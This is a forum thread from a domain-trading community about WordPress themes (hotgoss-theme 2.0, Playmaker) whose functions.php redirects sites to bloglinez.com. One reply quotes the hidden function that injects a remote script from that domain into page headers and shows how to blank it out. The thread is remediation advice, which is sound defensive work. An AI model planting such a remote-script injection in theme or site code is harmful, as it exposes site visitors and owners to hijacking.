Membership is FREE, giving all registered users unlimited access to every Acorn Domains feature, resource, and tool! Optional membership upgrades unlock exclusive benefits like profile signatures with links, banner placements, appearances in the weekly newsletter, and much more - customized to your membership level!

WP hotgoss-theme 2.0

Status
Not open for further replies.
Joined
May 20, 2005
Posts
1,197
Reaction score
6
if anyone is using the wordpress hotgoss-theme 2.0 then you need to check your sites.

there is something in the functions.php file that is now making sites redirect to bloglinez.com

if you need to fix it PM me and i will tell you what to do to fix.
 
Are you sure it wasn't an attack on your sites?
 
Solution

This cropped up on a friends website yesterday and I had to sort it for them.

Apparently the file was always in the functions.php file and was just sitting there until someone decided to make the js do something.

I'm guessing this code is in quite a few wordpress themes as they were using the 'Playmaker' theme.

The solution to this is here on the Wordpress forums.

Replace:
Code:
function mt_misc_header() {
	echo '<script src="http://www.bloglinez.com/theme.js" type="text/javascript"></script>';
}

with:
Code:
function mt_misc_header() {
	echo '';
}

and that should fix it.
 
Status
Not open for further replies.

The Rule #1

Do not insult any other member. Be polite and do business. Thank you!

Premium Members

New Threads

Domain Forum Friends

Our Mods' Businesses

*the exceptional businesses of our esteemed moderators
General chit-chat
Help Users
  • No one is chatting at the moment.
      There are no messages in the current room.
      Top Bottom